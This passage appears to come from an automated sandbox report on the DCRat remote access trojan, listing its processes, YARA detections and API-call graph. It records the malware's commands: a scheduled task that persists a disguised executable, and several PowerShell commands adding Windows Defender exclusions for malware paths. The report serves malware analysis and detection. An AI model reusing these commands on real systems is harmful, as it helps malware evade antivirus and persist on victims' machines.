                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000007.00000002.1869897360.0000000002C04000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000007.00000002.1869897360.0000000002C1F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000007.00000002.1869897360.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000007.00000002.1914350978.0000000012ABD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                Target ID:32
                                Start time:04:02:11
                                Start date:26/05/2024
                                Path:C:\Windows\System32\schtasks.exe
                                Wow64 process (32bit):false
                                Commandline:schtasks.exe /create /tn "qiOZcVoixJLcuAFKAnRdq" /sc MINUTE /mo 12 /tr "'C:\Program Files\Uninstall Information\qiOZcVoixJLcuAFKAnRd.exe'" /f
                                Imagebase:0x7ff76f990000
                                File size:235'008 bytes
                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:35
                                Start time:04:02:12
                                Start date:26/05/2024
                                Path:C:\Windows\addins\audiodg.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\addins\audiodg.exe
                                Imagebase:0xf00000
                                File size:1'489'408 bytes
                                MD5 hash:E780BB029D808CB41937F4F7CD022B45
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000023.00000002.2381409608.0000000003261000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                Target ID:38
                                Start time:04:02:12
                                Start date:26/05/2024
                                Path:C:\Windows\addins\audiodg.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\addins\audiodg.exe
                                Imagebase:0x20000
                                File size:1'489'408 bytes
                                MD5 hash:E780BB029D808CB41937F4F7CD022B45
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000026.00000002.2564245326.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                Target ID:40
                                Start time:04:02:12
                                Start date:26/05/2024
                                Path:C:\Recovery\explorer.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Recovery\explorer.exe
                                Imagebase:0x6f0000
                                File size:1'489'408 bytes
                                MD5 hash:E780BB029D808CB41937F4F7CD022B45
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000028.00000002.2514657098.0000000002A1F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000028.00000002.2514657098.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                Target ID:41
                                Start time:04:02:12
                                Start date:26/05/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe'
                                Imagebase:0x7ff788560000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:42
                                Start time:04:02:12
                                Start date:26/05/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'
                                Imagebase:0x7ff788560000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:43
                                Start time:04:02:12
                                Start date:26/05/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                Target ID:44
                                Start time:04:02:12
                                Start date:26/05/2024
                                Path:C:\Recovery\explorer.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Recovery\explorer.exe
                                Imagebase:0x5f0000
                                File size:1'489'408 bytes
                                MD5 hash:E780BB029D808CB41937F4F7CD022B45
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000002C.00000002.2426637115.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000002C.00000002.2426637115.000000000290E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                Target ID:45
                                Start time:04:02:12
                                Start date:26/05/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\addins\audiodg.exe'
                                Imagebase:0x7ff788560000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:46
                                Start time:04:02:12
                                Start date:26/05/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                Target ID:47
                                Start time:04:02:12
                                Start date:26/05/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Fonts\qiOZcVoixJLcuAFKAnRd.exe'
                                Imagebase:0x7ff788560000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:48
                                Start time:04:02:12
                                Start date:26/05/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:false

                                Target ID:49
                                Start time:04:02:12
                                Start date:26/05/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\qiOZcVoixJLcuAFKAnRd.exe'
                                Imagebase:0x7ff788560000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                  Execution Graph

                                  Execution Coverage:9.7%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:9.3%
                                  Total number of Nodes:1480
                                  Total number of Limit Nodes:26
23664->23665 23666 8300c8 23664->23666 23667 8300bb LoadLibraryW 23665->23667 23666->23580 23667->23666 23668->23570 23674 82ddff 23669->23674 23673 8435bb 23672->23673 23673->23602 23673->23673 23680 82d28a 23674->23680 23677 82de22 LoadStringW 23678 82ddfc 23677->23678 23679 82de39 LoadStringW 23677->23679 23678->23604 23679->23678 23685 82d1c3 23680->23685 23682 82d2a7 23683 82d2bc 23682->23683 23693 82d2c8 26 API calls 23682->23693 23683->23677 23683->23678 23686 82d1de 23685->23686 23692 82d1d7 _strncpy 23685->23692 23688 82d202 23686->23688 23694 831596 WideCharToMultiByte 23686->23694 23691 82d233 23688->23691 23695 82dd6b 50 API calls __vsnprintf 23688->23695 23696 8458d9 26 API calls 3 library calls 23691->23696 23692->23682 23693->23683 23694->23688 23695->23691 23696->23692 23697->23620 23720 839d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23698->23720 23700 839d21 23701 839d2d 23700->23701 23721 839d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23700->23721 23701->23635 23701->23636 23701->23637 23704 839e70 23703->23704 23705 839e3e SizeofResource 23703->23705 23704->23628 23705->23704 23706 839e52 LoadResource 23705->23706 23706->23704 23707 839e63 LockResource 23706->23707 23707->23704 23708 839e77 GlobalAlloc 23707->23708 23708->23704 23709 839e92 GlobalLock 23708->23709 23710 839f21 GlobalFree 23709->23710 23711 839ea1 __vswprintf_c_l 23709->23711 23710->23704 23712 839f1a GlobalUnlock 23711->23712 23722 839d7b GdipAlloc 23711->23722 23712->23710 23715 839f05 23715->23712 23716 839eef GdipCreateHBITMAPFromBitmap 23716->23715 23717->23640 23718->23643 23719->23645 23720->23700 23721->23701 23723 839d8d 23722->23723 23725 839d9a 23722->23725 23726 839b0f 23723->23726 23725->23712 23725->23715 23725->23716 23727 839b30 GdipCreateBitmapFromStreamICM 23726->23727 23728 839b37 GdipCreateBitmapFromStream 23726->23728 23729 839b3c 23727->23729 23728->23729 23729->23725 23731 82d34b _wcschr __EH_prolog 23730->23731 23732 82d37a GetModuleFileNameW 
23731->23732 23734 82d3ab 23731->23734 23733 82d394 23732->23733 23733->23734 23772 8299b0 23734->23772 23736 82d407 23783 845a90 26 API calls 3 library calls 23736->23783 23740 82d3db 23740->23736 23742 833781 76 API calls 23740->23742 23754 82d627 23740->23754 23741 82d41a 23784 845a90 26 API calls 3 library calls 23741->23784 23742->23740 23744 82d563 23744->23754 23809 829d30 77 API calls 23744->23809 23748 82d57d ___std_exception_copy 23749 829bf0 80 API calls 23748->23749 23748->23754 23752 82d5a6 ___std_exception_copy 23749->23752 23751 82d42c 23751->23744 23751->23754 23785 829e40 23751->23785 23800 829bf0 23751->23800 23808 829d30 77 API calls 23751->23808 23752->23754 23768 82d5b2 ___std_exception_copy 23752->23768 23810 83137a MultiByteToWideChar 23752->23810 23793 829653 23754->23793 23755 82d72b 23811 82ce72 76 API calls 23755->23811 23757 82da0a 23816 82ce72 76 API calls 23757->23816 23759 82d9fa 23759->23648 23760 82d771 23812 845a90 26 API calls 3 library calls 23760->23812 23761 833781 76 API calls 23763 82d742 23761->23763 23763->23760 23763->23761 23764 82d78b 23813 845a90 26 API calls 3 library calls 23764->23813 23766 831596 WideCharToMultiByte 23766->23768 23768->23754 23768->23755 23768->23757 23768->23759 23768->23766 23814 82dd6b 50 API calls __vsnprintf 23768->23814 23815 8458d9 26 API calls 3 library calls 23768->23815 23771 82d32f 23770->23771 23771->23651 23773 8299ba 23772->23773 23774 829a39 CreateFileW 23773->23774 23775 829aaa 23774->23775 23776 829a59 GetLastError 23774->23776 23777 829ae1 23775->23777 23779 829ac7 SetFileTime 23775->23779 23778 82b66c 2 API calls 23776->23778 23777->23740 23780 829a79 23778->23780 23779->23777 23780->23775 23781 829a7d CreateFileW GetLastError 23780->23781 23782 829aa1 23781->23782 23782->23775 23783->23741 23784->23751 23786 829e64 SetFilePointer 23785->23786 23787 829e53 23785->23787 23788 829e82 GetLastError 23786->23788 23789 829e9d 23786->23789 23787->23789 23817 826fa5 75 API calls 
23787->23817 23788->23789 23791 829e8c 23788->23791 23789->23751 23791->23789 23818 826fa5 75 API calls 23791->23818 23794 829677 23793->23794 23799 829688 23793->23799 23795 829683 23794->23795 23796 82968a 23794->23796 23794->23799 23819 829817 23795->23819 23824 8296d0 23796->23824 23799->23648 23802 829c03 23800->23802 23803 829bfc 23800->23803 23802->23803 23805 829c9e 23802->23805 23807 829cc0 23802->23807 23839 82984e 23802->23839 23803->23751 23805->23803 23851 826f6b 75 API calls 23805->23851 23806 82984e 5 API calls 23806->23807 23807->23803 23807->23806 23808->23751 23809->23748 23810->23768 23811->23763 23812->23764 23813->23754 23814->23768 23815->23768 23816->23759 23817->23786 23818->23789 23820 829820 23819->23820 23821 829824 23819->23821 23820->23799 23821->23820 23830 82a12d 23821->23830 23825 8296dc 23824->23825 23826 8296fa 23824->23826 23825->23826 23828 8296e8 FindCloseChangeNotification 23825->23828 23827 829719 23826->23827 23838 826e3e 74 API calls 23826->23838 23827->23799 23828->23826 23831 83e360 23830->23831 23832 82a13a DeleteFileW 23831->23832 23833 82984c 23832->23833 23834 82a14d 23832->23834 23833->23799 23835 82b66c 2 API calls 23834->23835 23836 82a161 23835->23836 23836->23833 23837 82a165 DeleteFileW 23836->23837 23837->23833 23838->23827 23840 829867 ReadFile 23839->23840 23841 82985c GetStdHandle 23839->23841 23842 829880 23840->23842 23849 8298a0 23840->23849 23841->23840 23852 829989 23842->23852 23844 829887 23845 8298b7 23844->23845 23846 8298a8 GetLastError 23844->23846 23850 829895 23844->23850 23848 8298c7 GetLastError 23845->23848 23845->23849 23846->23845 23846->23849 23847 82984e GetFileType 23847->23849 23848->23849 23848->23850 23849->23802 23850->23847 23851->23803 23853 829992 GetFileType 23852->23853 23854 82998f 23852->23854 23855 8299a0 23853->23855 23854->23844 23855->23844 23859 83e24f ___std_exception_copy 23856->23859 23857 838854 23857->23471 23859->23857 23862 8471ad 7 API calls 2 library calls 
23859->23862 23863 83ecce RaiseException Concurrency::cancel_current_task new 23859->23863 23864 83ecb1 RaiseException Concurrency::cancel_current_task 23859->23864 23862->23859 23866 847430 _abort 23865->23866 23867 847448 23866->23867 23868 84757e _abort GetModuleHandleW 23866->23868 23887 84a3f1 EnterCriticalSection 23867->23887 23870 84743c 23868->23870 23870->23867 23899 8475c2 GetModuleHandleExW 23870->23899 23871 8474ee 23888 84752e 23871->23888 23874 847450 23874->23871 23876 8474c5 23874->23876 23907 847f30 20 API calls _abort 23874->23907 23879 8474dd 23876->23879 23884 8481f1 _abort 5 API calls 23876->23884 23877 847537 23908 851a19 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 23877->23908 23878 84750b 23891 84753d 23878->23891 23880 8481f1 _abort 5 API calls 23879->23880 23880->23871 23884->23879 23887->23874 23909 84a441 LeaveCriticalSection 23888->23909 23890 847507 23890->23877 23890->23878 23910 84a836 23891->23910 23894 84756b 23897 8475c2 _abort 8 API calls 23894->23897 23895 84754b GetPEB 23895->23894 23896 84755b GetCurrentProcess TerminateProcess 23895->23896 23896->23894 23898 847573 ExitProcess 23897->23898 23900 8475ec GetProcAddress 23899->23900 23901 84760f 23899->23901 23902 847601 23900->23902 23903 847615 FreeLibrary 23901->23903 23904 84761e 23901->23904 23902->23901 23903->23904 23905 83ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23904->23905 23906 847628 23905->23906 23906->23867 23907->23876 23909->23890 23911 84a85b 23910->23911 23915 84a851 23910->23915 23912 84a458 __dosmaperr 5 API calls 23911->23912 23912->23915 23913 83ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23914 847547 23913->23914 23914->23894 23914->23895 23915->23913 24800 83acd0 100 API calls 24849 8319d0 26 API calls std::bad_exception::bad_exception 23917 8210d5 23922 825bd7 23917->23922 23923 825be1 __EH_prolog 23922->23923 23929 82b07d 23923->23929 23925 825bed 23935 825dcc 
GetCurrentProcess GetProcessAffinityMask 23925->23935 23930 82b087 __EH_prolog 23929->23930 23936 82ea80 80 API calls 23930->23936 23932 82b099 23937 82b195 23932->23937 23936->23932 23938 82b1a7 ___scrt_get_show_window_mode 23937->23938 23941 830948 23938->23941 23944 830908 GetCurrentProcess GetProcessAffinityMask 23941->23944 23945 82b10f 23944->23945 23945->23925 23959 83aee0 23960 83aeea __EH_prolog 23959->23960 24122 82130b 23960->24122 23963 83af18 23964 83b5cb 24187 83cd2e 23964->24187 23965 83af2c 23965->23963 23968 83afa2 23965->23968 23969 83af39 23965->23969 23972 83b041 GetDlgItemTextW 23968->23972 23978 83afbc 23968->23978 23973 83af75 23969->23973 23974 83af3e 23969->23974 23970 83b5f7 23976 83b611 GetDlgItem SendMessageW 23970->23976 23977 83b600 SendDlgItemMessageW 23970->23977 23971 83b5e9 SendMessageW 23971->23970 23972->23973 23975 83b077 23972->23975 23973->23963 23979 83af96 EndDialog 23973->23979 23974->23963 23983 82ddd1 53 API calls 23974->23983 23980 83b08f GetDlgItem 23975->23980 23989 83b080 23975->23989 24205 839da4 GetCurrentDirectoryW 23976->24205 23977->23976 23982 82ddd1 53 API calls 23978->23982 23979->23963 23985 83b0c5 SetFocus 23980->23985 23986 83b0a4 SendMessageW SendMessageW 23980->23986 23987 83afde SetDlgItemTextW 23982->23987 23988 83af58 23983->23988 23984 83b641 GetDlgItem 23990 83b664 SetWindowTextW 23984->23990 23991 83b65e 23984->23991 23992 83b0d5 23985->23992 24004 83b0ed 23985->24004 23986->23985 23993 83afec 23987->23993 24227 821241 SHGetMalloc 23988->24227 23989->23973 23995 83b56b 23989->23995 24206 83a2c7 GetClassNameW 23990->24206 23991->23990 23997 82ddd1 53 API calls 23992->23997 23993->23963 24003 83aff9 GetMessageW 23993->24003 24000 82ddd1 53 API calls 23995->24000 24002 83b0df 23997->24002 23998 83af5f 23998->23963 23999 83af63 SetDlgItemTextW 23998->23999 23999->23963 24005 83b57b SetDlgItemTextW 24000->24005 24228 83cb5a 24002->24228 24003->23963 24008 83b010 IsDialogMessageW 24003->24008 24012 82ddd1 
53 API calls 24004->24012 24009 83b58f 24005->24009 24008->23993 24011 83b01f TranslateMessage DispatchMessageW 24008->24011 24014 82ddd1 53 API calls 24009->24014 24011->23993 24013 83b124 24012->24013 24018 82400a _swprintf 51 API calls 24013->24018 24019 83b5b8 24014->24019 24015 83b6af 24017 83b6df 24015->24017 24022 82ddd1 53 API calls 24015->24022 24016 83bdf5 98 API calls 24016->24015 24028 83bdf5 98 API calls 24017->24028 24059 83b797 24017->24059 24023 83b136 24018->24023 24024 82ddd1 53 API calls 24019->24024 24020 83b0e6 24132 82a04f 24020->24132 24026 83b6c2 SetDlgItemTextW 24022->24026 24027 83cb5a 16 API calls 24023->24027 24024->23963 24033 82ddd1 53 API calls 24026->24033 24027->24020 24034 83b6fa 24028->24034 24029 83b847 24035 83b850 EnableWindow 24029->24035 24036 83b859 24029->24036 24030 83b174 GetLastError 24031 83b17f 24030->24031 24138 83a322 SetCurrentDirectoryW 24031->24138 24039 83b6d6 SetDlgItemTextW 24033->24039 24045 83b70c 24034->24045 24060 83b731 24034->24060 24035->24036 24037 83b876 24036->24037 24246 8212c8 GetDlgItem EnableWindow 24036->24246 24044 83b89d 24037->24044 24051 83b895 SendMessageW 24037->24051 24038 83b195 24042 83b1ac 24038->24042 24043 83b19e GetLastError 24038->24043 24039->24017 24041 83b78a 24047 83bdf5 98 API calls 24041->24047 24050 83b227 24042->24050 24054 83b237 24042->24054 24056 83b1c4 GetTickCount 24042->24056 24043->24042 24044->23963 24052 82ddd1 53 API calls 24044->24052 24244 839635 32 API calls 24045->24244 24046 83b86c 24247 8212c8 GetDlgItem EnableWindow 24046->24247 24047->24059 24050->24054 24055 83b46c 24050->24055 24051->24044 24058 83b8b6 SetDlgItemTextW 24052->24058 24053 83b725 24053->24060 24062 83b407 24054->24062 24063 83b24f GetModuleFileNameW 24054->24063 24147 8212e6 GetDlgItem ShowWindow 24055->24147 24064 82400a _swprintf 51 API calls 24056->24064 24057 83b825 24245 839635 32 API calls 24057->24245 24058->23963 24059->24029 24059->24057 24066 82ddd1 53 API calls 24059->24066 
24060->24041 24067 83bdf5 98 API calls 24060->24067 24062->23973 24075 82ddd1 53 API calls 24062->24075 24238 82eb3a 80 API calls 24063->24238 24070 83b1dd 24064->24070 24066->24059 24072 83b75f 24067->24072 24068 83b47c 24148 8212e6 GetDlgItem ShowWindow 24068->24148 24139 82971e 24070->24139 24071 83b844 24071->24029 24072->24041 24076 83b768 DialogBoxParamW 24072->24076 24074 83b275 24078 82400a _swprintf 51 API calls 24074->24078 24079 83b41b 24075->24079 24076->23973 24076->24041 24077 83b486 24080 82ddd1 53 API calls 24077->24080 24081 83b297 CreateFileMappingW 24078->24081 24082 82400a _swprintf 51 API calls 24079->24082 24084 83b490 SetDlgItemTextW 24080->24084 24085 83b2f9 GetCommandLineW 24081->24085 24117 83b376 __vswprintf_c_l 24081->24117 24086 83b439 24082->24086 24149 8212e6 GetDlgItem ShowWindow 24084->24149 24092 83b30a 24085->24092 24096 82ddd1 53 API calls 24086->24096 24087 83b203 24088 83b20a GetLastError 24087->24088 24089 83b215 24087->24089 24088->24089 24094 829653 79 API calls 24089->24094 24090 83b381 ShellExecuteExW 24112 83b39e 24090->24112 24239 83ab2e SHGetMalloc 24092->24239 24094->24050 24095 83b4a2 SetDlgItemTextW GetDlgItem 24098 83b4d7 24095->24098 24099 83b4bf GetWindowLongW SetWindowLongW 24095->24099 24096->23973 24097 83b326 24240 83ab2e SHGetMalloc 24097->24240 24150 83bdf5 24098->24150 24099->24098 24103 83b332 24241 83ab2e SHGetMalloc 24103->24241 24104 83b3e1 24104->24062 24111 83b3f7 UnmapViewOfFile CloseHandle 24104->24111 24105 83bdf5 98 API calls 24107 83b4f3 24105->24107 24175 83d0f5 24107->24175 24108 83b33e 24242 82ecad 80 API calls ___scrt_get_show_window_mode 24108->24242 24111->24062 24112->24104 24115 83b3cd Sleep 24112->24115 24114 83b355 MapViewOfFile 24114->24117 24115->24104 24115->24112 24116 83bdf5 98 API calls 24120 83b519 24116->24120 24117->24090 24118 83b542 24243 8212c8 GetDlgItem EnableWindow 24118->24243 24120->24118 24121 83bdf5 98 API calls 24120->24121 24121->24118 24123 821314 24122->24123 
24124 82136d 24122->24124 24125 82137a 24123->24125 24248 82da98 62 API calls 2 library calls 24123->24248 24249 82da71 GetWindowLongW SetWindowLongW 24124->24249 24125->23963 24125->23964 24125->23965 24128 821336 24128->24125 24129 821349 GetDlgItem 24128->24129 24129->24125 24130 821359 24129->24130 24130->24125 24131 82135f SetWindowTextW 24130->24131 24131->24125 24135 82a059 24132->24135 24133 82a0ea 24134 82a207 9 API calls 24133->24134 24136 82a113 24133->24136 24134->24136 24135->24133 24135->24136 24250 82a207 24135->24250 24136->24030 24136->24031 24138->24038 24140 829728 24139->24140 24141 829792 CreateFileW 24140->24141 24142 829786 24140->24142 24141->24142 24143 8297e4 24142->24143 24144 82b66c 2 API calls 24142->24144 24143->24087 24145 8297cb 24144->24145 24145->24143 24146 8297cf CreateFileW 24145->24146 24146->24143 24147->24068 24148->24077 24149->24095 24151 83bdff __EH_prolog 24150->24151 24152 83b4e5 24151->24152 24153 83aa36 ExpandEnvironmentStringsW 24151->24153 24152->24105 24159 83be36 _wcsrchr 24153->24159 24155 83aa36 ExpandEnvironmentStringsW 24155->24159 24156 83c11d SetWindowTextW 24156->24159 24159->24152 24159->24155 24159->24156 24160 8435de 22 API calls 24159->24160 24162 83bf0b SetFileAttributesW 24159->24162 24168 83c2e7 GetDlgItem SetWindowTextW SendMessageW 24159->24168 24170 83c327 SendMessageW 24159->24170 24271 8317ac CompareStringW 24159->24271 24272 839da4 GetCurrentDirectoryW 24159->24272 24274 82a52a 7 API calls 24159->24274 24275 82a4b3 FindClose 24159->24275 24276 83ab9a 76 API calls ___std_exception_copy 24159->24276 24160->24159 24164 83bfc5 GetFileAttributesW 24162->24164 24174 83bf25 ___scrt_get_show_window_mode 24162->24174 24164->24159 24166 83bfd7 DeleteFileW 24164->24166 24166->24159 24167 83bfe8 24166->24167 24169 82400a _swprintf 51 API calls 24167->24169 24168->24159 24171 83c008 GetFileAttributesW 24169->24171 24170->24159 24171->24167 24172 83c01d MoveFileW 24171->24172 24172->24159 24173 83c035 
MoveFileExW 24172->24173 24173->24159 24174->24159 24174->24164 24273 82b4f7 52 API calls 2 library calls 24174->24273 24176 83d0ff __EH_prolog 24175->24176 24277 82fead 24176->24277 24178 83d130 24281 825c59 24178->24281 24180 83d14e 24285 827c68 24180->24285 24184 83d1a1 24302 827cfb 24184->24302 24186 83b504 24186->24116 24188 83cd38 24187->24188 24189 839d1a 4 API calls 24188->24189 24190 83cd3d 24189->24190 24191 83b5d1 24190->24191 24192 83cd45 GetWindow 24190->24192 24191->23970 24191->23971 24192->24191 24193 83cd65 24192->24193 24193->24191 24194 83cd72 GetClassNameW 24193->24194 24196 83cd96 GetWindowLongW 24193->24196 24197 83cdfa GetWindow 24193->24197 24736 8317ac CompareStringW 24194->24736 24196->24197 24198 83cda6 SendMessageW 24196->24198 24197->24191 24197->24193 24198->24197 24199 83cdbc GetObjectW 24198->24199 24737 839d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24199->24737 24201 83cdd3 24738 839d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24201->24738 24739 839f5d 8 API calls ___scrt_get_show_window_mode 24201->24739 24204 83cde4 SendMessageW DeleteObject 24204->24197 24205->23984 24207 83a2e8 24206->24207 24208 83a30d 24206->24208 24740 8317ac CompareStringW 24207->24740 24210 83a312 SHAutoComplete 24208->24210 24211 83a31b 24208->24211 24210->24211 24214 83a7c3 24211->24214 24212 83a2fb 24212->24208 24213 83a2ff FindWindowExW 24212->24213 24213->24208 24215 83a7cd __EH_prolog 24214->24215 24216 821380 82 API calls 24215->24216 24217 83a7ef 24216->24217 24741 821f4f 24217->24741 24220 83a809 24222 821631 84 API calls 24220->24222 24221 83a818 24223 821951 126 API calls 24221->24223 24224 83a814 24222->24224 24225 83a83a __vswprintf_c_l ___std_exception_copy 24223->24225 24224->24015 24224->24016 24225->24224 24226 821631 84 API calls 24225->24226 24226->24224 24227->23998 24749 83ac74 PeekMessageW 24228->24749 24231 83cbbc SendMessageW SendMessageW 24233 83cc17 SendMessageW SendMessageW SendMessageW 24231->24233 24234 83cbf8 
24231->24234 24232 83cb88 24235 83cb93 ShowWindow SendMessageW SendMessageW 24232->24235 24236 83cc4a SendMessageW 24233->24236 24237 83cc6d SendMessageW 24233->24237 24234->24233 24235->24231 24236->24237 24237->24020 24238->24074 24239->24097 24240->24103 24241->24108 24242->24114 24243->23989 24244->24053 24245->24071 24246->24046 24247->24037 24248->24128 24249->24125 24251 82a214 24250->24251 24252 82a238 24251->24252 24253 82a22b CreateDirectoryW 24251->24253 24254 82a180 4 API calls 24252->24254 24253->24252 24255 82a26b 24253->24255 24256 82a23e 24254->24256 24258 82a27a 24255->24258 24263 82a444 24255->24263 24257 82a27e GetLastError 24256->24257 24259 82b66c 2 API calls 24256->24259 24257->24258 24258->24135 24261 82a254 24259->24261 24261->24257 24262 82a258 CreateDirectoryW 24261->24262 24262->24255 24262->24257 24264 83e360 24263->24264 24265 82a451 SetFileAttributesW 24264->24265 24266 82a467 24265->24266 24267 82a494 24265->24267 24268 82b66c 2 API calls 24266->24268 24267->24258 24269 82a47b 24268->24269 24269->24267 24270 82a47f SetFileAttributesW 24269->24270 24270->24267 24271->24159 24272->24159 24273->24174 24274->24159 24275->24159 24276->24159 24278 82feba 24277->24278 24306 821789 24278->24306 24280 82fed2 24280->24178 24282 82fead 24281->24282 24283 821789 76 API calls 24282->24283 24284 82fed2 24283->24284 24284->24180 24286 827c72 __EH_prolog 24285->24286 24323 82c827 24286->24323 24288 827c8d 24289 83e24a new 8 API calls 24288->24289 24290 827cb7 24289->24290 24329 83440b 24290->24329 24293 827ddf 24294 827de9 24293->24294 24296 827e53 24294->24296 24358 82a4c6 24294->24358 24297 827ec4 24296->24297 24300 82a4c6 8 API calls 24296->24300 24336 82837f 24296->24336 24301 827f06 24297->24301 24364 826dc1 74 API calls 24297->24364 24300->24296 24301->24184 24303 827d09 24302->24303 24305 827d10 24302->24305 24304 831acf 84 API calls 24303->24304 24304->24305 24307 82179f 24306->24307 24318 8217fa __vswprintf_c_l 24306->24318 24308 8217c8 
